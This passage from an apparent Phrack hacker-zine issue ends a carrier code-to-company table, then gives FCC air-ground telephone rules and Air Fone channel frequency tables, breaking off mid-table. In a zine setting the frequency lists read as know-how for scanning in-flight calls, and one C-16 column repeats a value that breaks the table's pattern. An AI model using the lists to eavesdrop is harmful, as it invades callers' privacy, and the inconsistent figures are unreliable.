|
375 ATL ATC
|
|
376 ECR ECONO-CALL LONG DISTANCE
|
|
377 GTS TELENET COMMUNICATIONS CORPORATION
|
|
378 NTP NATIONAL TELEPHONE COMPANY
|
|
379 EMI EASTERN MICROWAVE
|
|
381 LMI LONG DISTANCE OF MICHIGAN
|
|
382 ATX AT&T-C
|
|
383 TDD MCI / TELECONNECT
|
|
384 FDT FRIEND TECHNOLOGIES
|
|
385 CAB HEDGES COMMUNICATIONS /COM CABLE LAYING
|
|
386 TBQ TELECABLE CORPORATION
|
|
387 CAN TELCOM CANADA
|
|
388 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
390 EBR ECONO-CALL
|
|
392 ATX AT&T-C
|
|
393 EXF PIONEER TELEPHONE /EXECULINES OF FLORIDA
|
|
394 TDX CABLE & WIRELESS COMMUNICATIONS
|
|
395 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
396 BOA BANK OF AMERICA
|
|
397 TDD MCI / TELECONNECT
|
|
399 ARZ AMERICALL CORPORATION (CA)
|
|
402 RCCP RADIO COMMON CARRIER PAGING
|
|
412 RCCP RADIO COMMON CARRIER PAGING
|
|
420 TGR TMC OF SOUTHWEST FLORIDA
|
|
421 ATX AT&T-C
|
|
422 ATX AT&T-C
|
|
423 ATX AT&T-C
|
|
424 ATX AT&T-C
|
|
425 TTH TELE TECH, INC.
|
|
426 ATX AT&T-C
|
|
427 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
|
|
428 ATX AT&T-C
|
|
429 TRF T-TEL
|
|
431 ATX AT&T-C
|
|
432 ATX AT&T-C
|
|
433 ATX AT&T-C
|
|
434 AGN AMERIGON
|
|
435 ATX AT&T-C
|
|
436 IDN INDIANA SWITCH, INC.
|
|
437 ATX AT&T-C
|
|
438 ATX AT&T-C
|
|
439 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
|
|
440 TXN TEX-NET
|
|
441 ATX AT&T-C
|
|
442 ATX AT&T-C
|
|
443 ATX AT&T-C
|
|
444 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
445 ATX AT&T-C
|
|
446 ATX AT&T-C
|
|
447 ATX AT&T-C
|
|
448 ATX AT&T-C
|
|
449 UTD UNITED TELCO / TELAMAR
|
|
450 USL US LINK LONG DISTANCE
|
|
451 ATX AT&T-C
|
|
452 ATX AT&T-C
|
|
453 ATX AT&T-C
|
|
454 ALN ALLNET COMMUNICATIONS SERVICES
|
|
455 LDG LDD, INC.
|
|
456 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
457 ATX AT&T-C
|
|
458 ATX AT&T-C
|
|
459 9631 NORTHWEST BELL
|
|
460 NTX NATIONAL TELEPHONE EXCHANGE
|
|
461 CAN TELCOM CANADA
|
|
462 ATX AT&T-C
|
|
463 CAN TELCOM CANADA
|
|
464 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
|
|
465 CAN TELCOM CANADA
|
|
466 ALN ALLNET COMMUNICATIONS SERVICES
|
|
467 LDD LDDS COMMUNICATIONS
|
|
468 ATX AT&T-C
|
|
469 IAS IOWA NETWORK SERVICES
|
|
471 ALN ALLNET COMMUNICATIONS SERVICES
|
|
472 ATX AT&T-C
|
|
473 UTC US TELCOM, INC./US SPRINT
|
|
474 32V1 VIRGIN ISLAND TELEPHONE
|
|
475 TDD MCI / TELECONNECT
|
|
476 SNT MCI / TDD / SOUTHERNNET, INC.
|
|
477 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
478 AAM ALASCOM
|
|
479 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
|
|
481 1186 GTE/NORTH
|
|
482 ATX AT&T-C
|
|
483 0328 GTE/FLORIDA
|
|
484 TDD MCI / TELECONNECT
|
|
485 TDD MCI / TELECONNECT
|
|
486 TDX CABLE & WIRELESS COMMUNICATIONS
|
|
487 UTC US TELCOM, INC./US SPRINT
|
|
488 UTC US TELCOM, INC./US SPRINT
|
|
489 LDD LDDS COMMUNICATIONS
|
|
492 ATX AT&T-C
|
|
493 IPC INTERNATION PACIFIC
|
|
494 NWR NETWORK TELEPHONE SERVICE
|
|
495 JNT J-NET COMMUNICATIONS
|
|
496 TRA3 TRAFFIC ROUTING ADMINISTRATION 3
|
|
502 RCCP RADIO COMMON CARRIER PAGING
|
|
512 RCCP RADIO COMMON CARRIER PAGING
|
|
520 PCD PENTAGON COMPUTER DATA, LTD.
|
|
521 ATX AT&T-C
|
|
522 ATX AT&T-C
|
|
523 ATX AT&T-C
|
|
524 ATX AT&T-C
|
|
525 ATX AT&T-C
|
|
526 ATX AT&T-C
|
|
527 ATX AT&T-C
|
|
528 ATX AT&T-C
|
|
529 MIT MIDCO COMMUNICATIONS
|
|
530 VRT VARTEC NATIONAL, INC.
|
|
531 ATX AT&T-C
|
|
532 ATX AT&T-C
|
|
533 ATX AT&T-C
|
|
534 TRA3 TRAFFIC ROUTING ADMINISTRATION 3
|
|
535 ATX AT&T-C
|
|
536 ALN ALLNET COMMUNICATIONS SERVICES
|
|
537 ATX AT&T-C
|
|
538 ATX AT&T-C
|
|
539 FNE FIRST PHONE
|
|
540 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
|
|
541 ATX AT&T-C
|
|
542 ATX AT&T-C
|
|
543 ATX AT&T-C
|
|
544 ATX AT&T-C
|
|
545 ATX AT&T-C
|
|
546 UTC US TELCOM, INC./US SPRINT
|
|
547 ATX AT&T-C
|
|
548 ATX AT&T-C
|
|
549 CBU CALL AMERICA
|
|
550 CMA CALL-AMERICA
|
|
551 ATX AT&T-C
|
|
552 ATX AT&T-C
|
|
553 ATX AT&T-C
|
|
554 ATX AT&T-C
|
|
555 ATX AT&T-C
|
|
556 ATX AT&T-C
|
|
557 ALN ALLNET COMMUNICATIONS SERVICES
|
|
558 ATX AT&T-C
|
|
561 CAN TELCOM CANADA
|
|
562 ATX AT&T-C
|
|
563 CAN TELCOM CANADA
|
|
564 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
|
|
565 CAN TELCOM CANADA
|
|
566 ALN ALLNET COMMUNICATIONS SERVICES
|
|
567 CAN TELCOM CANADA
|
|
568 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
569 TEN TELESPHERE NETWORK
|
|
572 ATX AT&T-C
|
|
574 AMM ACCESS LONG DISTANCE
|
|
575 AOI UNITED COMMUNICATIONS, INC.
|
|
577 GTS TELENET COMMUNICATIONS CORPORATION
|
|
579 LNS LINTEL SYSTEMS
|
|
580 WES WESTEL
|
|
582 ATX AT&T-C
|
|
583 TDD MCI / TELECONNECT
|
|
584 TDD MCI / TELECONNECT
|
|
586 ATC ACTION TELECOM COMPANY
|
|
587 LTQ LONG DISTANCE FOR LESS
|
|
588 ATC ACTION TELECOM COMPANY
|
|
589 LGT LITEL
|
|
592 ATX AT&T-C
|
|
593 TDD MCI / TELECONNECT
|
|
594 TDD MCI / TELECONNECT
|
|
595 32P1 PUERTO RICO TELEPHONE
|
|
596 TOI TELECOM "OPTIONS" PLUS, INC.
|
|
599 LDM LONG DISTANCE MANAGEMENT
|
|
602 RCCP RADIO COMMON CARRIER PAGING
|
|
612 RCCP RADIO COMMON CARRIER PAGING
|
|
621 ATX AT&T-C
|
|
622 ATX AT&T-C
|
|
623 TRA3 TRAFFIC ROUTING ADMINISTRATION 3
|
|
624 ATX AT&T-C
|
|
625 NLD NATIONAL DATA CORP
|
|
626 ATX AT&T-C
|
|
627 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
628 ATX AT&T-C
|
|
629 2284 BEEHIVE TELEPHONE
|
|
631 ATX AT&T-C
|
|
632 ATX AT&T-C
|
|
633 ATX AT&T-C
|
|
634 ATX AT&T-C
|
|
635 ATX AT&T-C
|
|
636 CQU CONQUEST COMMUNICATION CORPORATION
|
|
637 ATX AT&T-C
|
|
638 ATX AT&T-C
|
|
639 BUR BURLINGTON TEL
|
|
640 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
|
|
641 ATX AT&T-C
|
|
642 ATX AT&T-C
|
|
643 ATX AT&T-C
|
|
644 CMA CALL-AMERICA
|
|
645 ATX AT&T-C
|
|
646 UTT UNION TELEPHONE COMPANY
|
|
647 ATX AT&T-C
|
|
648 ATX AT&T-C
|
|
649 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
|
|
652 ATX AT&T-C
|
|
654 ATX AT&T-C
|
|
655 ESM EXECULINE OF SACRAMENTO, INC.
|
|
656 AVX AMVOX
|
|
657 TDD MCI / TELECONNECT
|
|
658 TDD MCI / TELECONNECT
|
|
659 UTC US TELCOM, INC./US SPRINT
|
|
660 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
|
|
661 CAN TELCOM CANADA
|
|
662 ATX AT&T-C
|
|
663 CAN TELCOM CANADA
|
|
664 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
665 CAN TELCOM CANADA
|
|
666 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
667 CAN TELCOM CANADA
|
|
668 CAN TELCOM CANADA
|
|
669 UTC US TELCOM, INC./US SPRINT
|
|
672 ATX AT&T-C
|
|
673 SNT MCI / TDD / SOUTHERNNET, INC.
|
|
674 TDD MCI / TELECONNECT
|
|
675 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
|
|
676 UTC US TELCOM, INC./US SPRINT
|
|
677 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
678 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
679 VOB TRANS-NET, INC.
|
|
680 2408 PACIFIC TELCOM
|
|
682 ATX AT&T-C
|
|
683 MTD METROMEDIA LONG DISTANCE
|
|
684 NTQ NORTHERN TELECOM, INC.
|
|
685 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
686 LGT LITEL
|
|
687 NTS NTS COMMUNICATIONS
|
|
688 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
689 NWS NORTHWEST TELCO
|
|
691 32D1 DOMIN REPUBLIC TELEPHONE
|
|
692 ATX AT&T-C
|
|
693 JJJ TRI-J
|
|
694 TZC TELESCAN
|
|
695 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
696 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
|
|
698 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
|
|
699 PLG PILGRIM TELEPHONE CO.
|
|
702 RCCP RADIO COMMON CARRIER PAGING
|
|
712 RCCP RADIO COMMON CARRIER PAGING
|
|
720 TGN TELEMANAGEMENT CONSULT'T CORP
|
|
721 FLX FLEX COMMUNICATIONS
|
|
722 ATX AT&T-C
|
|
723 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
724 RTC RCI CORPORATION
|
|
725 ATL ATC
|
|
726 UTC US TELCOM, INC./US SPRINT
|
|
727 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
728 TDD MCI / TELECONNECT
|
|
729 UTC US TELCOM, INC./US SPRINT
|
|
732 ATX AT&T-C
|
|
733 UTC US TELCOM, INC./US SPRINT
|
|
734 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
|
|
735 UTC US TELCOM, INC./US SPRINT
|
|
736 UTC US TELCOM, INC./US SPRINT
|
|
737 MEC MERCURY, INC.
|
|
738 MEC MERCURY, INC.
|
|
741 ATL ATC
|
|
742 ATX AT&T-C
|
|
743 UTC US TELCOM, INC./US SPRINT
|
|
744 TRA3 TRAFFIC ROUTING ADMINISTRATION 3
|
|
745 UTC US TELCOM, INC./US SPRINT
|
|
746 FTC FTC COMMUNICATIONS, INCORPORATION
|
|
747 TDD MCI / TELECONNECT
|
|
748 TDD MCI / TELECONNECT
|
|
749 ATL ATC
|
|
752 ATX AT&T-C
|
|
753 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
754 TSH TEL-SHARE
|
|
755 UTC US TELCOM, INC./US SPRINT
|
|
756 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
757 TID TMC OF SOUTH CENTRAL INDIANA
|
|
759 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
761 ACX ALTERNATE COMMUNICATIONS TECHNOLOGY
|
|
762 ATX AT&T-C
|
|
763 TON TOUCH & SAVE
|
|
764 AAM ALASCOM
|
|
765 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
766 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
767 UTC US TELCOM, INC./US SPRINT
|
|
768 SNT MCI / TDD / SOUTHERNNET, INC.
|
|
770 3300 GENERAL COMMUNICATIONS
|
|
771 SNT MCI / TDD / SOUTHERNNET, INC.
|
|
772 ATX AT&T-C
|
|
773 CUX COMPU-TEL INC.
|
|
774 TTQ TTE OF CHARLESTON
|
|
776 UTC US TELCOM, INC./US SPRINT
|
|
777 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
778 EDS ELECTRONIC DATA SYSTEMS CORPORATION
|
|
779 TDD MCI / TELECONNECT
|
|
780 SNT MCI / TDD / SOUTHERNNET, INC.
|
|
782 ATX AT&T-C
|
|
783 ALN ALLNET COMMUNICATIONS SERVICES
|
|
784 ALG AMERICAN LONG LINE
|
|
785 SNH SUNSHINE TELEPHONE CO.
|
|
786 0341 UNITED/FLORIDA
|
|
787 MAD MID ATLANTIC TELECOM
|
|
788 UTC US TELCOM, INC./US SPRINT
|
|
789 TMU TEL-AMERICA, INC.
|
|
792 ATX AT&T-C
|
|
794 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
|
|
797 TAM TMC OF SOUTH CENTRAL INDIANA
|
|
798 TDD MCI / TELECONNECT
|
|
800 UTC US TELCOM, INC./US SPRINT
|
|
802 RCCP RADIO COMMON CARRIER PAGING
|
|
807 NTI NETWORK TELECOMMUNICATIONS
|
|
808 AAX AMERITECH AUDIOTEX SERVICES
|
|
812 RCCP RADIO COMMON CARRIER PAGING
|
|
821 ATX AT&T-C
|
|
822 ATX AT&T-C
|
|
823 THA TOUCH AMERICA
|
|
824 ATX AT&T-C
|
|
825 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
826 ATX AT&T-C
|
|
827 UTC US TELCOM, INC./US SPRINT
|
|
828 ATX AT&T-C
|
|
829 UTC US TELCOM, INC./US SPRINT
|
|
831 ATX AT&T-C
|
|
832 ATX AT&T-C
|
|
833 ATX AT&T-C
|
|
834 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
|
|
835 ATX AT&T-C
|
|
836 TDD MCI / TELECONNECT
|
|
837 TDD MCI / TELECONNECT
|
|
838 0567 UNITED/INT MN
|
|
839 VST STAR-LINE
|
|
841 ATX AT&T-C
|
|
842 ATX AT&T-C
|
|
843 ATX AT&T-C
|
|
844 LDD LDDS COMMUNICATIONS
|
|
845 ATX AT&T-C
|
|
846 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
847 ATX AT&T-C
|
|
848 ATX AT&T-C
|
|
849 BTM BUSINESS TELECOM, INC.
|
|
850 TKC TK COMMUNICATIONS
|
|
851 ATX AT&T-C
|
|
852 ATX AT&T-C
|
|
853 UTY UNIVERSAL COMMUNICATIONS
|
|
854 ATX AT&T-C
|
|
855 ATX AT&T-C
|
|
857 TDD MCI / TELECONNECT
|
|
858 ATX AT&T-C
|
|
860 VNS VIRTUAL NETWORK
|
|
862 ATX AT&T-C
|
|
863 ALN ALLNET COMMUNICATIONS SERVICES
|
|
864 TEN TELESPHERE NETWORK
|
|
865 3100 HAWAIIAN TELEPHONE
|
|
866 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
867 RBL VORTEL
|
|
868 SNT MCI / TDD / SOUTHERNNET, INC.
|
|
869 UTC US TELCOM, INC./US SPRINT
|
|
871 TXL DIGITAL NETWORK, INC.
|
|
872 ATX AT&T-C
|
|
873 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
874 ATX AT&T-C
|
|
875 ALN ALLNET COMMUNICATIONS SERVICES
|
|
876 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
877 UTC US TELCOM, INC./US SPRINT
|
|
878 ALN ALLNET COMMUNICATIONS SERVICES
|
|
879 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
880 NTV NATIONAL TELECOMMUNICATIONS
|
|
881 NTV NATIONAL TELECOMMUNICATIONS
|
|
882 ATX AT&T-C
|
|
883 TDX CABLE & WIRELESS COMMUNICATIONS
|
|
884 UTC US TELCOM, INC./US SPRINT
|
|
885 SDY TELVUE,CORP
|
|
886 ALN ALLNET COMMUNICATIONS SERVICES
|
|
887 ETS EASTERN TELEPHONE SYSTEMS, INC.
|
|
888 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
889 2408 PACIFIC TELCOM
|
|
890 ATZ ATX-COMMUNICATIONS
|
|
891 TVT TMC COMMUNICATIONS
|
|
892 ATX AT&T-C
|
|
896 TXN TEX-NET
|
|
898 CGI COMMUNICATIONS GROUP OF JACKSON
|
|
899 TDX CABLE & WIRELESS COMMUNICATIONS
|
|
902 RCCP RADIO COMMON CARRIER PAGING
|
|
908 AAX AMERITECH AUDIOTEX SERVICES
|
|
912 RCCP RADIO COMMON CARRIER PAGING
|
|
922 ATX AT&T-C
|
|
923 ALN ALLNET COMMUNICATIONS SERVICES
|
|
924 NASC 800 NUMBER SERVICE & ASSIGNMENT CENTER
|
|
925 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
926 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
927 UTC US TELCOM, INC./US SPRINT
|
|
928 ALU AMERICALL SYSTEMS - LOUISIANNA
|
|
932 ATX AT&T-C
|
|
933 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
934 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
936 RBW R-COMM
|
|
937 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
939 TZX TELENATIONAL COMMUNICATIONS
|
|
940 TSF ATC / SOUTH TEL
|
|
942 ATX AT&T-C
|
|
943 AUU AUS, INC.
|
|
944 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
945 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
946 API PHONE ONE - AMERICAN PIONEER TELEPHONE
|
|
947 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
948 PHX PHOENIX NETWORK
|
|
950 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
951 BML PHONE AMERICA
|
|
952 ATX AT&T-C
|
|
955 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
960 CNO COMTEL OF NEW ORLEANS
|
|
962 ATX AT&T-C
|
|
963 SOC STATE OF CALIFORNIA
|
|
964 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
965 TLX TMC OF LEXINGTON
|
|
966 TDX CABLE & WIRELESS COMMUNICATIONS
|
|
967 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
968 TED TELEDIAL AMERICA
|
|
969 TDX CABLE & WIRELESS COMMUNICATIONS
|
|
972 ATX AT&T-C
|
|
980 VLW VALU-LINE OF LONGVIEW, INC.
|
|
981 32P1 PUERTO RICO TELEPHONE
|
|
982 ATX AT&T-C
|
|
983 WUT WESTERN UNION TELEGRAPH CO.
|
|
986 WUT WESTERN UNION TELEGRAPH CO.
|
|
987 BTL BITTEL TELECOMMUNICATIONS CORPORATION
|
|
988 TDD MCI / TELECONNECT
|
|
989 TDX CABLE & WIRELESS COMMUNICATIONS
|
|
990 FEB FEB CORPORATION
|
|
992 ATX AT&T-C
|
|
993 LKS ?
|
|
996 VOA VALU-LINE
|
|
999 MCI MCI TELECOMMUNICATIONS CORPORATION
|
|
_______________________________________________________________________________
|
|
|
|
|
|
|
|
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume Four, Issue Thirty-Nine, File 8 of 13
|
|
|
|
Air Fone Frequencies
|
|
by Leroy Donnelly
|
|
Leroy.Donnelly@IVGATE.OMAHUG.ORG
|
|
|
|
|
|
This is a quick file on the subject of what frequencies are used for Air Fone
|
|
Telephone while in-flight air-to-ground. The following should give you some an
|
|
understanding of how it all works.
|
|
|
|
The FCC has issued rules on allocation of the 849-851/894-895 MHz bands for
|
|
air-ground radiotelephone service.
|
|
|
|
The most recent action was effective September 9, 1991:
|
|
|
|
1) Changed channel spacing from GTE Airfone Inc.'s de facto standards;
|
|
|
|
2) Ordered GTE to make its service available to other air-ground licensees
|
|
at non-discriminatory rates;
|
|
|
|
3) Divided each channel block into 6 control channels (P-1 through P-6)
|
|
and 29 communications channels (C-1 through C-29);
|
|
|
|
4) Provided for a communications channel bandwidth of 6 kHz;
|
|
|
|
5) Gave GTE 22 months to modify its current control channel scheme; during
|
|
this period, GTE can use the lower 20 kHz of each channel block, which
|
|
includes channels C-1, C-2, and C-3, for control. GTE then has another
|
|
38 months during which it can only use a 3.2 kHz control channel in
|
|
channel C-2 of each channel block. After these transition periods end
|
|
(September of 1996), GTE must switch to control channels marked P-1
|
|
through P-6 in the tables below;
|
|
|
|
6) Empowered the FCC to assign exclusively one control channel to each
|
|
air-ground licensee;
|
|
|
|
7) Limited the ERP of airborne stations to 30 watts maximum; and that of
|
|
ground stations to 100 watts maximum;
|
|
|
|
8) Limited the ERP of ground stations to 1 watt when communicating with
|
|
aircraft on the ground.
|
|
|
|
|
|
GROUND TO AIR CHANNELS
|
|
|
|
(NOTE: "GB" in these listings denotes Guard Band, a series of 3 kHz spacings
|
|
to separate communications channels from control channels.)
|
|
|
|
CH. # CHANNEL BLOCK
|
|
|
|
10 9 8 7 6
|
|
C-1 849.0055 849.2055 849.4055 849.6055 849.8055
|
|
C-2 849.0115 849.2115 849.4115 849.6115 849.8115
|
|
C-3 849.0175 849.2175 849.4175 849.6175 849.8175
|
|
C-4 849.0235 849.2235 849.4235 849.6235 849.8235
|
|
C-5 849.0295 849.2295 849.4295 849.6295 849.8295
|
|
C-6 849.0355 849.2355 849.4355 849.6355 849.8355
|
|
C-7 849.0415 849.2415 849.4415 849.6415 849.8415
|
|
C-8 849.0475 849.2475 849.4475 849.6475 849.8475
|
|
C-9 849.0535 849.2535 849.4535 849.6535 849.8535
|
|
C-10 849.0595 849.2595 849.4595 849.6595 849.8595
|
|
C-11 849.0655 849.2655 849.4655 849.6655 849.8655
|
|
C-12 849.0715 849.2715 849.4715 849.6715 849.8715
|
|
C-13 849.0775 849.2775 849.4775 849.6775 849.8775
|
|
C-14 849.0835 849.2835 849.4835 849.6835 849.8835
|
|
C-15 849.0895 849.2895 849.4895 849.6895 849.8895
|
|
C-16 849.0955 849.2855 849.4955 849.6955 849.8955
|
|
C-17 849.1015 849.3015 849.5015 849.7015 849.9015
|
|
C-18 849.1075 849.3075 849.5075 849.7075 849.9075
|
|
C-19 849.1135 849.3135 849.5135 849.7135 849.9135
|
|
C-20 849.1195 849.3195 849.5195 849.7195 849.9195
|
|
C-21 849.1255 849.3255 849.5255 849.7255 849.9255
|
|
C-22 849.1315 849.3315 849.5315 849.7315 849.9315
|
|
C-23 849.1375 849.3375 849.5375 849.7375 849.9375
|
|
C-24 849.1435 849.3435 849.5435 849.7435 849.9435
|
|
C-25 849.1495 849.3495 849.5495 849.7495 849.9495
|
|
C-26 849.1555 849.3555 849.5555 849.7555 849.9555
|
|
C-27 849.1615 849.3615 849.5615 849.7615 849.9615
|
|
C-28 849.1675 849.3675 849.5675 849.7675 849.9675
|
|
C-29 849.1735 849.3735 849.5735 849.7735 849.9735
|
|
GB 849.1765 849.3765 849.5765 849.7765 849.9765
|
|
to to to to to
|
|
849.1797 849.3797 849.5797 849.7797 849.9797
|
|
P-6 849.1813 849.3813 849.5813 849.7813 849.9813
|
|
P-5 849.1845 849.3845 849.5845 849.7845 849.9845
|
|
P-4 849.1877 849.3877 849.5877 849.7877 849.9877
|
|
P-3 849.1909 849.3909 849.5909 849.7909 849.9909
|
|
P-2 849.1941 849.3941 849.5941 849.7941 849.9941
|
|
P-1 849.1973 849.3973 849.5973 849.7973 849.9973
|
|
|
|
|
|
5 4 3 2 1
|
|
C-1 850.0055 850.2055 850.4055 850.6055 850.8055
|
|
C-2 850.0115 850.2115 850.4115 850.6115 850.8115
|
|
C-3 850.0175 850.2175 850.4175 850.6175 850.8175
|
|
C-4 850.0235 850.2235 850.4235 850.6235 850.8235
|
|
C-5 850.0295 850.2295 850.4295 850.6295 850.8295
|
|
C-6 850.0355 850.2355 850.4355 850.6355 850.8355
|
|
C-7 850.0415 850.2415 850.4415 850.6415 850.8415
|
|
C-8 850.0475 850.2475 850.4475 850.6475 850.8475
|
|
C-9 850.0535 850.2535 850.4535 850.6535 850.8535
|
|
C-10 850.0595 850.2595 850.4595 850.6595 850.8595
|
|
C-11 850.0655 850.2655 850.4655 850.6655 850.8655
|
|
C-12 850.0715 850.2715 850.4715 850.6715 850.8715
|
|
C-13 850.0775 850.2775 850.4775 850.6775 850.8775
|
|
C-14 850.0835 850.2835 850.4835 850.6835 850.8835
|
|
C-15 850.0895 850.2895 850.4895 850.6895 850.8895
|
|
C-16 850.0955 850.2855 850.4955 850.6955 850.8955
|
|
C-17 850.1015 850.3015 850.5015 850.7015 850.9015
|
|
C-18 850.1075 850.3075 850.5075 850.7075 850.9075
|
|
C-19 850.1135 850.3135 850.5135 850.7135 850.9135
|
|
C-20 850.1195 850.3195 850.5195 850.7195 850.9195
|
|
C-21 850.1255 850.3255 850.5255 850.7255 850.9255
|
|
C-22 850.1315 850.3315 850.5315 850.7315 850.9315
|
|
C-23 850.1375 850.3375 850.5375 850.7375 850.9375
|
|
C-24 850.1435 850.3435 850.5435 850.7435 850.9435
|
|
C-25 850.1495 850.3495 850.5495 850.7495 850.9495
|
|
C-26 850.1555 850.3555 850.5555 850.7555 850.9555
|
|
C-27 850.1615 850.3615 850.5615 850.7615 850.9615
|
|
C-28 850.1675 850.3675 850.5675 850.7675 850.9675
|
|
C-29 850.1735 850.3735 850.5735 850.7735 850.9735
|
|
GB 850.1765 850.3765 850.5765 850.7765 850.9765
|
|
to to to to to
|
|
850.1797 850.3797 850.5797 850.7797 850.9797
|
|
P-6 850.1813 850.3813 850.5813 850.7813 850.9813
|
|
P-5 850.1845 850.3845 850.5845 850.7845 850.9845
|
|
P-4 850.1877 850.3877 850.5877 850.7877 850.9877
|
|
P-3 850.1909 850.3909 850.5909 850.7909 850.9909
|
|
P-2 850.1941 850.3941 850.5941 850.7941 850.9941
|
|
P-1 850.1973 850.3973 850.5973 850.7973 850.9973
|
|
|
|
|
|
AIR TO GROUND CHANNELS
|
|
|
|
CH. # CHANNEL BLOCK
|
|
10 9 8 7 6
|
|
C-1 894.0055 894.2055 894.4055 894.6055 894.8055
|
|
C-2 894.0115 894.2115 894.4115 894.6115 894.8115
|
|
C-3 894.0175 894.2175 894.4175 894.6175 894.8175
|
|
C-4 894.0235 894.2235 894.4235 894.6235 894.8235
|
|
C-5 894.0295 894.2295 894.4295 894.6295 894.8295
|
|
C-6 894.0355 894.2355 894.4355 894.6355 894.8355
|
|
C-7 894.0415 894.2415 894.4415 894.6415 894.8415
|
|
C-8 894.0475 894.2475 894.4475 894.6475 894.8475
|
|
C-9 894.0535 894.2535 894.4535 894.6535 894.8535
|
|
C-10 894.0595 894.2595 894.4595 894.6595 894.8595
|
|
C-11 894.0655 894.2655 894.4655 894.6655 894.8655
|
|
C-12 894.0715 894.2715 894.4715 894.6715 894.8715
|
|
C-13 894.0775 894.2775 894.4775 894.6775 894.8775
|
|
C-14 894.0835 894.2835 894.4835 894.6835 894.8835
|
|
C-15 894.0895 894.2895 894.4895 894.6895 894.8895
|
|
C-16 894.0955 894.2855 894.4955 894.6955 894.8955
|
|
C-17 894.1015 894.3015 894.5015 894.7015 894.9015
|
|
C-18 894.1075 894.3075 894.5075 894.7075 894.9075
|
|
C-19 894.1135 894.3135 894.5135 894.7135 894.9135
|
|
C-20 894.1195 894.3195 894.5195 894.7195 894.9195
|
|
C-21 894.1255 894.3255 894.5255 894.7255 894.9255
|
|
C-22 894.1315 894.3315 894.5315 894.7315 894.9315
|
|
C-23 894.1375 894.3375 894.5375 894.7375 894.9375
|
|
C-24 894.1435 894.3435 894.5435 894.7435 894.9435
|
|
C-25 894.1495 894.3495 894.5495 894.7495 894.9495
|
|
C-26 894.1555 894.3555 894.5555 894.7555 894.9555
|
|
C-27 894.1615 894.3615 894.5615 894.7615 894.9615
|
|
C-28 894.1675 894.3675 894.5675 894.7675 894.9675
|
|
C-29 894.1735 894.3735 894.5735 894.7735 894.9735
|
|
GB 894.1765 894.3765 894.5765 894.7765 894.9765
|
|
to to to to to
|
|
894.1797 894.3797 894.5797 894.7797 894.9797
|
|
P-6 894.1813 894.3813 894.5813 894.7813 894.9813
|
|
P-5 894.1845 894.3845 894.5845 894.7845 894.9845
|
|
P-4 894.1877 894.3877 894.5877 894.7877 894.9877
|
|
P-3 894.1909 894.3909 894.5909 894.7909 894.9909
|
|
P-2 894.1941 894.3941 894.5941 894.7941 894.9941
|
|
P-1 894.1973 894.3973 894.5973 894.7973 894.9973
|
|
|
|
|
|
5 4 3 2 1
|
|
C-1 895.0055 895.2055 895.4055 895.6055 895.8055
|
|
C-2 895.0115 895.2115 895.4115 895.6115 895.8115
|
|
C-3 895.0175 895.2175 895.4175 895.6175 895.8175
|
|
C-4 895.0235 895.2235 895.4235 895.6235 895.8235
|
|
C-5 895.0295 895.2295 895.4295 895.6295 895.8295
|
|
C-6 895.0355 895.2355 895.4355 895.6355 895.8355
|
|
C-7 895.0415 895.2415 895.4415 895.6415 895.8415
|
|
C-8 895.0475 895.2475 895.4475 895.6475 895.8475
|
|
C-9 895.0535 895.2535 895.4535 895.6535 895.8535
|
|
C-10 895.0595 895.2595 895.4595 895.6595 895.8595
|
|
C-11 895.0655 895.2655 895.4655 895.6655 895.8655
|
|
C-12 895.0715 895.2715 895.4715 895.6715 895.8715
|
|
